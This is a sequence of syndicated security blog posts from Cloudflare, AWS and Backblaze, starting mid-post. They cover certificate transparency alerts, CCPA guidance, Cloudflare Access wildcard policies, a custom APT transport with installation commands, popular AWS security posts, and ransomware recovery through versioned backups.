If you opt into CT Monitoring, we’ll send you an email whenever a certificate is issued for one of your domains. When you get an alert, don’t panic; we err on the side of caution by sending alerts whenever a possible domain match is found. Sometimes you may notice a suspicious certificate. Maybe you won’t recognize the issuer, or the subdomain is not one you offer (e.g. slowinternet.cloudflare.com). Alerts are sent quickly so you can contact a CA if something seems wrong.

This raises the question: if services already audit public logs, why are alerts necessary? Shouldn’t errors be found automatically? Well no, because auditing is not exhaustive. The best person to audit your certificates is you. You know your website. You know your personal information. Cloudflare will put relevant certificates right in front of you.

You can enable CT Monitoring on the Cloudflare dashboard. Just head over to the Crypto Tab and find the “Certificate Transparency Monitoring” card. You can always turn the feature off if you’re too popular in the CT world.

If you’re on a Business or Enterprise plan, you can tell us who to notify. Instead of emailing the zone owner (which we do for Free and Pro customers), we accept up to 10 email addresses as alert recipients. We do this to avoid overwhelming large teams. These emails do not have to be tied to a Cloudflare account and can be manually added or removed at any time.

How This Actually Works

Our Cryptography and SSL teams worked hard to make this happen; they built on the work of some clever tools mentioned earlier:

  • Merkle Town is a hub for CT data. We process all trusted certificates and present relevant statistics on our website. This means that every certificate issued on the Internet passes through Cloudflare, and all the data is public (so no privacy concerns here).
  • Cloudflare Nimbus is our very own CT log. It contains more than 400 million certificates.

Note: Cloudflare, Google, and DigiCert are not the only CT log providers.

So here’s the process… At some point in time, you (or an impostor) request a certificate for your website. A Certificate Authority approves the request and issues the certificate. Within 24 hours, the CA sends this certificate to a set of CT logs. This is where we come in: Cloudflare uses an internal process known as “The Crawler” to look through millions of certificate records. Merkle Town dispatches The Crawler to monitor CT logs and check for new certificates. When The Crawler finds a new certificate, it pulls the entire certificate through Merkle Town.

When we process the certificate in Merkle Town, we also check it against a list of monitored domains. If you have CT Monitoring enabled, we’ll send you an alert immediately. This is only possible because of Merkle Town’s existing infrastructure. Also, The Crawler is ridiculously fast.

I Got a Certificate Alert. What Now?

Good question. Most of the time, certificate alerts are routine. Certificates expire and renew on a regular basis, so it’s totally normal to get these emails. If everything looks correct (the issuer, your domain name, etc.), go ahead and toss that email in the trash.

In rare cases, you might get an email that looks suspicious. We provide a detailed support article that will help. The basic protocol is this:

  1. Contact the CA (listed as “Issuer” in the email).
  2. Explain why you think the certificate is suspicious.
  3. The CA should revoke the certificate (if it really is malicious).

We also have a friendly support team that can be reached here. While Cloudflare is not a CA and cannot revoke certificates, our support team knows quite a bit about certificate management and is ready to help.

The Future

Certificate Transparency has started making regular appearances on the Cloudflare blog. Why? It’s required by Chrome and Safari, which dominate the browser market and set precedents for Internet security. But more importantly, CT can help us spot malicious certificates before they are used in attacks. This is why we will continue to refine and improve our certificate detection methods.

What are you waiting for? Go enable Certificate Transparency Monitoring!

Introducing the “Preparing for the California Consumer Privacy Act” whitepaper

Post Syndicated from Julia Soscia original https://aws.amazon.com/blogs/security/introducing-the-preparing-for-the-california-consumer-privacy-act-whitepaper/

AWS has published a whitepaper, Preparing for the California Consumer Privacy Act, to provide guidance on designing and updating your cloud architecture to follow the requirements of the California Consumer Privacy Act (CCPA), which goes into effect on January 1, 2020.

The whitepaper is intended for engineers and solution builders, but it also serves as a guide for qualified security assessors (QSAs) and internal security assessors (ISAs) so that you can better understand the range of AWS products and services that are available for you to use.

The CCPA was enacted into law on June 28, 2018 and grants California consumers certain privacy rights. The CCPA grants consumers the right to request that a business disclose the categories and specific pieces of personal information collected about the consumer, the categories of sources from which that information is collected, the “business purposes” for collecting or selling the information, and the categories of third parties with whom the information is shared. This whitepaper looks to address the three main subsections of the CCPA: data collection, data retrieval and deletion, and data awareness.

To read the text of the CCPA, please visit the website for California Legislative Information.

If you have questions or want to learn more, contact your account executive or leave a comment below.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Julia Soscia

Julia is a Solutions Architect at Amazon Web Services based out of New York City. Her main focus is to help customers create well-architected environments on the AWS cloud platform. She is an experienced data analyst with a focus in Big Data and Analytics.

Anthony Pasquarielo

Anthony is a Solutions Architect at Amazon Web Services. He’s based in New York City. His main focus is providing customers technical guidance and consultation during their cloud journey. Anthony enjoys delighting customers by designing well-architected solutions that drive value and provide growth opportunity for their business.

Justin De Castri

Justin is a Manager of Solutions Architecture at Amazon Web Services based in New York City. His primary focus is helping customers build secure, scalable, and cost-optimized solutions that are aligned with their business objectives.

Securing infrastructure at scale with Cloudflare Access

Post Syndicated from Jeremy Bernick original https://blog.cloudflare.com/access-wildcard-subdomain/

I rarely have to deal with the hassle of using a corporate VPN and I hope it remains this way. As a new member of the Cloudflare team, that seems possible. Coworkers who joined a few years ago did not have that same luck. They had to use a VPN to get any work done. What changed?

Cloudflare released Access, and now we’re able to do our work without ever needing a VPN again. Access is a way to control access to your internal applications and infrastructure. Today, we’re releasing a new feature to help you replace your VPN by deploying Access at an even greater scale.

Access in an instant

Access replaces a corporate VPN by evaluating every request made to a resource secured behind Access. Administrators can make web applications, remote desktops, and physical servers available at dedicated URLs, configured as DNS records in Cloudflare. These tools are protected via access policies, set by the account owner, so that only authenticated users can access those resources. End users can authenticate over both HTTPS and SSH requests. They’re prompted to log in with their SSO credentials, and Access redirects them to the application or server.

For your team, Access makes your internal web applications and servers in your infrastructure feel as seamless to reach as your SaaS tools. Originally we built Access to replace our own corporate VPN. In practice, this became the fastest way to control who can reach different pieces of our own infrastructure. However, administrators configuring Access were required to create a discrete policy for each application/hostname. Now, administrators don’t have to create a dedicated policy for each new resource secured by Access; a single policy can cover every protected URL.

When Access launched, the product’s primary use case was to secure internal web applications. Creating unique rules for each was tedious, but manageable. Access has since become a centralized way to secure infrastructure in many environments. Now that companies are using Access to secure hundreds of resources, that method of building policies no longer fits.

Starting today, Access users can build policies using a wildcard subdomain, replacing dozens or even hundreds of bespoke rules with a single policy. With a wildcard, the same ruleset will automatically apply to any subdomain your team generates that is gated by Access.

How can teams deploy at scale with wildcard subdomains?

Administrators can secure their infrastructure with a wildcard policy in the Cloudflare dashboard. With Access enabled, Cloudflare adds identity-based evaluation to that traffic.

In the Access dashboard, you can now build a rule to secure any subdomain of the site you added to Cloudflare. Create a new policy and enter a wildcard tag (“*”) into the subdomain field. You can then configure rules, at a granular level, using your identity provider to control who can reach any subdomain of that apex domain.

This new policy will propagate to all 180 of Cloudflare’s data centers in seconds and any new subdomains created will be protected.

How are teams using it?

Since releasing this feature in a closed beta, we’ve seen teams use it to gate access to their infrastructure in several new ways. Many teams use Access to secure dev and staging environments of sites that are being developed before they hit production. Whether for QA or collaboration with partner agencies, Access helps make it possible to share sites quickly with a layer of authentication. With wildcard subdomains, teams are deploying dozens of versions of new sites at new URLs without needing to touch the Access dashboard.

For example, an administrator can create a policy for “*.example.com” and then developers can deploy iterations of sites at “dev-1.example.com” and “dev-2.example.com” and both inherit the global Access policy.

The feature is also helping teams lock down their entire hybrid, on-premise, or public cloud infrastructure with the Access SSH feature. Teams can assign dynamic subdomains to their entire fleet of servers, regardless of environment, and developers and engineers can reach them over an SSH connection without a VPN. Administrators can now bring infrastructure online, in an entirely new environment, without additional or custom security rules.

What about creating DNS records?

Cloudflare Access requires users to associate a resource with a domain or subdomain. While the wildcard policy will cover all subdomains, teams will still need to connect their servers to the Cloudflare network and generate DNS records for those services.

Argo Tunnel can reduce that burden significantly. Argo Tunnel lets you expose a server to the Internet without opening any inbound ports. The service runs a lightweight daemon on your server that initiates outbound tunnels to the Cloudflare network.

Instead of managing DNS, network, and firewall complexity, Argo Tunnel helps administrators serve traffic from their origin through Cloudflare with a single command. That single command will generate the DNS record in Cloudflare automatically, allowing you to focus your time on building and managing your infrastructure.
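
As a rough sketch, exposing a local service looks something like this (assuming cloudflared is installed and authenticated for your zone; the hostname and port are placeholders):

# open an outbound tunnel that serves the local app at app.example.com
cloudflared tunnel --hostname app.example.com --url http://localhost:8000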

What’s next?

More teams are adopting a hybrid or multi-cloud model for deploying their infrastructure. In the past, these teams were left with just two options for securing those resources: peering a VPN with each provider or relying on custom IAM flows with each environment. In the end, both of these solutions were not only quite costly but also equally unmanageable.

While infrastructure benefits from becoming distributed, security is something that is best when controlled in a single place. Access can consolidate how a team controls who can reach their entire fleet of servers and services.

A Tale of Two (APT) Transports

Post Syndicated from Ryan Djurovich original https://blog.cloudflare.com/apt-transports/

Securing access to your APT repositories is critical. At Cloudflare, like in most organizations, we used a legacy VPN to lock down who could reach our internal software repositories. However, a network perimeter model lacks a number of features that we consider critical to a team’s security.

As a company, we’ve been moving our internal infrastructure to our own zero-trust platform, Cloudflare Access. Access added SaaS-like convenience to the on-premise tools we managed. We started with web applications and then moved resources we need to reach over SSH behind the Access gateway, for example Git or user-SSH access. However, we still needed to handle how services communicate with our internal APT repository.

We recently open sourced a new APT transport which allows customers to protect their private APT repositories using Cloudflare Access. In this post, we’ll outline the history of APT tooling, APT transports and introduce our new APT transport for Cloudflare Access.

A brief history of APT

Advanced Package Tool, or APT, simplifies the installation and removal of software on Debian and related Linux distributions. Originally released in 1998, APT was to Debian what the App Store was to modern smartphones – a decade ahead of its time!

APT sits atop the lower-level dpkg tool, which is used to install, query, and remove .deb packages – the primary software packaging format in Debian and related Linux distributions such as Ubuntu. With dpkg, packaging and managing software installed on your system became easier – but it didn’t solve the problem of distributing packages, whether via the Internet or local media; at the time of inception, it was commonplace to install packages from a CD-ROM.
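
For example, the basic dpkg operations look like this (the package name and file are illustrative):

sudo dpkg -i hello_2.10-1_amd64.deb   # install a local .deb package
dpkg -s hello                         # query the status of an installed package
sudo dpkg -r hello                    # remove an installed package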

APT introduced the concept of repositories – a mechanism for storing and indexing a collection of .deb packages. APT supports connecting to multiple repositories for finding packages and automatically resolving package dependencies. The way APT connects to said repositories is via a “transport” – a mechanism for communicating between the APT client and its repository source (more on this later).

APT over the Internet

Prior to version 1.5, APT did not include support for HTTPS – if you wanted to install a package over the Internet, your connection was not encrypted. This reduces privacy – an attacker snooping traffic could determine the specific package versions your system is installing. It also exposes you to man-in-the-middle attacks where an attacker could, for example, exploit a remote code execution vulnerability. Just 6 months ago, we saw an example of the latter with CVE-2019-3462.

Enter the APT HTTPS transport – an optional transport you can install to add support for connecting to repositories over HTTPS. Once installed, users need to configure their APT sources.list with repositories using HTTPS.
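
For example, a Stretch sources.list entry switched to HTTPS (via the deb.debian.org mirror-redirector) might look like:

deb https://deb.debian.org/debian stretch main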

The challenge here, of course, is that the most common way to install this transport is via APT and HTTP – a classic bootstrapping problem! An alternative here is to download the .deb package via curl and install it via dpkg. You’ll find the links to apt-transport-https binaries for Stretch here – once you have the URL path for your system architecture, you can download it from the deb.debian.org mirror-redirector over HTTPS, e.g. for amd64 (a.k.a. x86_64):

# download the package over HTTPS from the deb.debian.org mirror-redirector
curl -o apt-transport-https.deb -L https://deb.debian.org/debian/pool/main/a/apt/apt-transport-https_1.4.9_amd64.deb
# verify the download against the expected SHA-256 checksum before installing
HASH=c8c4366d1912ff8223615891397a78b44f313b0a2f15a970a82abe48460490cb && echo "$HASH  apt-transport-https.deb" | sha256sum -c
# install the verified package with dpkg
sudo dpkg -i apt-transport-https.deb

To confirm which APT transports are installed on your system, you can list each “method binary” that is installed:

ls /usr/lib/apt/methods

With apt-transport-https installed you should now see ‘https’ in that list.
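
On a typical Stretch system, the listing will look roughly like this (exact contents vary with what’s installed):

cdrom  copy  file  ftp  gpgv  http  https  mirror  rred  rsh  ssh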

The state of APT & HTTPS on Debian

You may be wondering how relevant this APT HTTPS transport is today. Given the prevalence of HTTPS on the web today, I was surprised when I found out exactly how relevant it is.

Up until a couple of weeks ago, Debian Stretch (9.x) was the current stable release; 9.0 was first released in June 2017 – and the latest version (9.9) includes apt 1.4.9 by default – meaning that securing your APT communication for Debian Stretch requires installing the optional apt-transport-https package.

Thankfully, on July 6 of this year, Debian released the latest version – Buster – which currently includes apt 1.8.2 with HTTPS support built-in by default, negating the need for installing the apt-transport-https package – and removing the bootstrapping challenge of installing HTTPS support via HTTPS!

BYO HTTPS APT Repository

A powerful feature of APT is the ability to run your own repository. You can mirror a public repository to improve performance or protect against an outage. And if you’re producing your own software packages, you can run your own repository to simplify distribution and installation of your software for your users.

If you have your own APT repository and you’re looking to secure it with HTTPS we’ve offered free Universal SSL since 2014 and last year introduced a way to require it site-wide automatically with one click. You’ll get the benefits of DDoS attack protection, a Global CDN with Caching, and Analytics.

But what if you’re looking for more than just HTTPS for your APT repository? For companies operating private APT repositories, authentication of your APT repository may be a challenge. This is where our new, custom APT transport comes in.

Building custom transports

The system design of APT is powerful in that it supports extensibility via Transport executables, but how does this mechanism work?

When APT attempts to connect to a repository, it finds the executable which matches the “scheme” from the repository URL (e.g. “https://” prefix on a repository results in the “https” executable being called).

APT then uses the common Linux standard streams: stdin, stdout, and stderr. It communicates via stdin/stdout using a set of plain-text Messages, which follow IETF RFC #822 (the same format that .deb “Package” files use).

Examples of input messages include “600 URI Acquire”, and examples of output messages include “200 URI Start” and “201 URI Done”.
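
A simplified sketch of one such exchange follows; fields are trimmed for brevity, and the URI, size, and filename values are purely illustrative:

600 URI Acquire
URI: https://deb.debian.org/debian/pool/main/h/hello/hello_2.10-1_amd64.deb
Filename: /var/cache/apt/archives/partial/hello_2.10-1_amd64.deb

200 URI Start
URI: https://deb.debian.org/debian/pool/main/h/hello/hello_2.10-1_amd64.deb
Size: 56132

201 URI Done
URI: https://deb.debian.org/debian/pool/main/h/hello/hello_2.10-1_amd64.deb
Filename: /var/cache/apt/archives/partial/hello_2.10-1_amd64.deb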

If you’re interested in building your own transport, check out the APT method interface spec for more implementation details.

APT meets Access

Cloudflare prioritizes dogfooding our own products early and often. The Access product has given our internal DevTools team a chance to work closely with the product team as we build features that help solve use cases across our organization. We’ve deployed new features internally, gathered feedback, improved them, and then released them to our customers. For example, we’ve been able to iterate on tools for Access like the Atlassian SSO plugin and the SSH feature, as collaborative efforts between DevTools and the Access team.

Our DevTools team wanted to take the same dogfooding approach to protect our internal APT repository with Access. We knew this would require a custom APT transport to support generating the required tokens and passing the correct headers in HTTPS requests to our internal APT repository server. We decided to build and test our own transport that both generated the necessary tokens and passed the correct headers to allow us to place our repository behind Access.

After months of internal use, we’re excited to announce that we have recently open-sourced our custom APT transport, so our customers can also secure their APT repositories by enabling authentication via Cloudflare Access.

By protecting your APT repository with Cloudflare Access, you can support authenticating users via Single-Sign On (SSO) providers, defining comprehensive access-control policies, and monitoring access and change logs.

Our APT transport leverages another Open Source tool we provide, cloudflared, which enables users to connect to your Cloudflare-protected domain securely.

Securing your APT Repository

To use our APT transport, you’ll need an APT repository that’s protected by Cloudflare Access. Our instructions (below) for using our transport will use apt.example.com as a hostname.

To use our APT transport with your own web-based APT repository, refer to our Setting Up Access guide.

APT Transport Installation

To install from source, both tools require Go – once you install Go, you can install `cloudflared` and our APT transport with four commands:

go get github.com/cloudflare/cloudflared/cmd/cloudflared
sudo cp ${GOPATH:-~/go}/bin/cloudflared /usr/local/bin/cloudflared
go get github.com/cloudflare/apt-transport-cloudflared/cmd/cfd
sudo cp ${GOPATH:-~/go}/bin/cfd /usr/lib/apt/methods/cfd

The above commands should place the cloudflared executable in /usr/local/bin (which should be on your PATH), and the APT transport binary in the required /usr/lib/apt/methods directory.

To confirm cloudflared is on your path, run:

which cloudflared

The above command should return /usr/local/bin/cloudflared

Now that the custom transport is installed, to start using it simply configure an APT source with the cfd:// scheme rather than https://, e.g.:

$ cat /etc/apt/sources.list.d/example.list 
deb [arch=amd64] cfd://apt.example.com/v2/stretch stable common

Next time you do `apt-get update` and `apt-get install`, a browser window will open asking you to log in over Cloudflare Access, and your package will be retrieved using the token returned by `cloudflared`.

Fetching a GPG Key over Access

Usually, private APT repositories will use SecureApt and have their own GPG public key that users must install to verify the integrity of data retrieved from that repository.

Users can also leverage cloudflared for securely downloading and installing those keys, e.g:

cloudflared access login https://apt.example.com
cloudflared access curl https://apt.example.com/public.gpg | sudo apt-key add -

The first command will open your web browser allowing you to authenticate for your domain. The second command wraps curl to download the GPG key, and hands it off to `apt-key add`.

Cloudflare Access on “headless” servers

If you’re looking to deploy APT repositories protected by Cloudflare Access to non-user-facing machines (a.k.a. “headless” servers), opening a browser does not work. The good news is that since February, Cloudflare Access has supported service tokens – and we’ve built support for them into our APT transport from day one.

If you’d like to use service tokens with our APT transport, it’s as simple as placing the token in a file in the correct path; because the machine already has a token, there is also no dependency on `cloudflared` for authentication. You can find details on how to set-up a service token in the APT transport README.

What’s next?

As demonstrated, you can get started using our APT transport today – we’d love to hear your feedback on this!

This work came out of an internal dogfooding effort, and we’re currently experimenting with additional packaging formats and tooling. If you’re interested in seeing support for another format or tool, please reach out.

Top 10 Security Blog posts in 2019 so far

Post Syndicated from Tom Olsen original https://aws.amazon.com/blogs/security/top-10-security-blog-posts-in-2019-so-far/

Twice a year, we like to share what’s been popular to let you know what everyone’s reading and so you don’t miss something interesting.

One of the top posts so far this year has been the registration announcement for the re:Inforce conference that happened last week. We hope you attended or watched the keynote live stream. Because the conference is now over, we omitted this from the list.

As always, let us know what you want to read about in the Comments section below – we read them all and appreciate the feedback.

The top 10 posts from 2019 based on page views

  1. How to automate SAML federation to multiple AWS accounts from Microsoft Azure Active Directory
  2. How to centralize and automate IAM policy creation in sandbox, development, and test environments
  3. AWS awarded PROTECTED certification in Australia
  4. Setting permissions to enable accounts for upcoming AWS Regions
  5. How to use service control policies to set permission guardrails across accounts in your AWS Organization
  6. Alerting, monitoring, and reporting for PCI-DSS awareness with Amazon Elasticsearch Service and AWS Lambda
  7. Updated whitepaper now available: Aligning to the NIST Cybersecurity Framework in the AWS Cloud
  8. How to visualize Amazon GuardDuty findings: serverless edition
  9. Guidelines for protecting your AWS account while using programmatic access
  10. How to quickly find and update your access keys, password, and MFA setting using the AWS Management Console

If you’re new to AWS and are just discovering the Security Blog, we’ve also compiled a list of older posts that customers continue to find useful.

The top 10 posts of all time based on page views

  1. Where’s My Secret Access Key?
  2. Writing IAM Policies: How to Grant Access to an Amazon S3 Bucket
  3. How to Restrict Amazon S3 Bucket Access to a Specific IAM Role
  4. Securely Connect to Linux Instances Running in a Private Amazon VPC
  5. Writing IAM Policies: Grant Access to User-Specific Folders in an Amazon S3 Bucket
  6. Setting the Record Straight on Bloomberg BusinessWeek’s Erroneous Article
  7. How to Connect Your On-Premises Active Directory to AWS Using AD Connector
  8. IAM Policies and Bucket Policies and ACLs! Oh, My! (Controlling Access to S3 Resources)
  9. A New and Standardized Way to Manage Credentials in the AWS SDKs
  10. How to Control Access to Your Amazon Elasticsearch Service Domain

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Tom Olsen

Tom shares responsibility for the AWS Security Blog with Becca Crockett. If you’ve got feedback about the blog, he wants to hear it in the Comments here or in any post. In his free time, you’ll either find him hanging out with his wife and their frog, in his woodshop, or skateboarding.

Becca Crockett

Becca co-manages the Security Blog with Tom Olsen. She enjoys guiding first-time blog contributors through the writing process, and she likes to interview people. In her free time, she drinks a lot of coffee and reads things. At work, she also drinks a lot of coffee and reads things.

When Ransomware Strikes

Post Syndicated from Natasha Rabinov original https://www.backblaze.com/blog/how-to-deal-with-ransomware/

Ransomware Prevention & Survival

Does this sound familiar? An employee walks over with panic and confusion written all over their face. They approach holding their laptop and say that they’re not sure what happened. You open their computer to find that there is a single message displayed:

You want your files?
Your computer has been infected with ransomware and you will need to pay us to get them back.

They may not know what just happened, but the sinking feeling in your stomach has a name you know well. Your company has been hit with ransomware, which is, unfortunately, a growing trend. The business of ransomware is a booming one, bringing productivity and growth to a dead stop.

As ransomware attacks on businesses of all sizes increase, ransomware may prove to be the single biggest destructive force for business data, surpassing even hard drive failures as the leading cause of data loss.

It’s a situation that most IT Managers will face at some point in their career. Per Security Magazine, “Eighty-six percent [of] Small to Medium Business (SMB) clients were recently victimized by ransomware.” In fact, it happened to us at Backblaze. Cybersecurity company Ice Cybersecurity published that ransomware attacks occur every 40 seconds (that’s over 2,000 times per day!). Coveware’s Ransomware Marketplace Report says that the average ransom cost has increased by 89% to $12,762, as compared to $6,733 in Q4 of 2018. The downtime resulting from ransomware is also on the rise. The average ransomware incident now lasts just over a week – 7.3 days – which should be factored in when calculating the true cost of ransomware. The estimated downtime costs per ransomware attack per company averaged $65,645. The increasing financial impact on businesses of all sizes has proven that the business of ransomware is booming, with no signs of slowing down.

How Has Ransomware Grown So Quickly?

Ransomware has taken advantage of multiple developments in technology, similar to other high-growth industries. The first attacks occurred in 1989, with floppy disks distributed across organizations purporting to raise money to fund AIDS research. At the time, users were asked to pay $189 to get their files back.

Since then, ransomware has grown significantly due to the advent of multiple facilitators. Sophisticated RSA encryption with increasing key sizes makes encrypted files more difficult to decrypt. Per the Carbon Black report, ransomware kits are now relatively easy to access on the dark web and only cost $10, on average. With cryptocurrency in place, payment is both virtually untraceable and irreversible. As recovery becomes more difficult, the cost to business rises alongside it. Per the Atlantic, ransomware now costs businesses more than $75 billion per year.

If Your Job is Protecting Company Data, What Happens After Your Ransomware Attack?

Isolate, Assess, Restore

Your first thought will probably be that you need to isolate any infected computers and get them off the network. Next, you may begin to assess the damage by determining the origins of the infected file and locating others that were affected. You can check our guide for recovering from ransomware or call in a specialized team to assist you. Once you prevent the malware from spreading, your thoughts will surely turn to the backup strategy you have in place. If you have used either a backup or sync solution to get your data offsite, you are more prepared than most. Unfortunately, even with this Eagle Scout level of preparedness, too often the backup solution hasn’t been tested against the exact scenario it’s needed for.

Both backup and sync solutions help get your data offsite. However, sync solutions vary greatly in their process for backup. Some require saving data to a specific folder. Others provide versions of files. Most offer varying pricing tiers for storage space. Backup solutions also have a multitude of features, some of which prove vital at the time of restore.

If you are in IT, you are constantly looking for points of failure. When it comes time to restore your data after a ransomware attack, three weak points immediately come to mind:

1. Your Security Breach Has Affected Your Backups

Redundancy is key in workflows. However, if you are syncing your data and get hit with ransomware on your local machine, your newly infected files will automatically sync to the cloud and thereby infect your backup set.

This can be mitigated with backup software that offers multiple versions of your files. Backup software, such as Backblaze Business Backup, saves your original file as is and creates a new backup file with every change made. If you accidentally delete a file or if your files are encrypted by ransomware and you are backed up with Backblaze Business Backup, you can simply restore a prior version of a file — one that has not been encrypted by the ransomware. The capability of your backup software to restore a prior version is the difference between usable and unusable data.

2. Restoring Data will be Cumbersome and Time-Consuming

Depending on the size of your dataset, restoring from the cloud can be a drawn-out process. Moreover, for those who need to restore gigabytes of data, the restore process may prove to be not only lengthy, but also tedious.

Snapshots allow you to restore all of your data from a specific point in time. When dealing with ransomware, this capability is crucial. Without this functionality, each file needs to be rolled back individually to a prior version and downloaded one at a time. At Backblaze, you can easily create a snapshot of your data and archive those snapshots into cloud storage to give you the appropriate amount of time to recover.

You can download the files that your employees need immediately and request the rest of their data to be shipped to you overnight on a USB drive. You can then either keep the drive or send it back for a full refund.

3. All Critical Data Didn’t Get Backed Up

Unfortunately, human error is the second leading cause of data loss. As humans, we all make mistakes, and some of those may have a large impact on company data. Although there is no way to prevent employees from spilling drinks on computers or leaving laptops on planes, other mistakes are easier to avoid. Some solutions require users to save their data to a specific folder to enable backups. When thinking about the files on your average employees’ desktops, are there any that may prove critical to your business? If so, they need to be backed up. Relying on those employees to change their work habits and begin saving files to specific, backed-up locations is neither the easiest nor the most reliable method of data protection.

In fact, it is the responsibility of the backup solution to protect business data, regardless of where the end user saves it. To that end, Backblaze backs up all user-generated data by default. The most effective backup solutions are ones that are easiest for the end users and require the least amount of user intervention.

Are you interested in assessing the risk to your business? Would you like to learn how to protect your business from ransomware? To better understand innovative ways that you can protect business data, we invite you to attend our Ransomware: Prevention and Survival webinar on July 17th. Join Steven Rahseparian, Chief Technical Officer at Ice CyberSecurity and industry expert on cybersecurity, to hear stories of ransomware and to learn how to take a proactive approach to protect your business data.

The post When Ransomware Strikes appeared first on Backblaze Blog | Cloud Storage & Cloud Backup.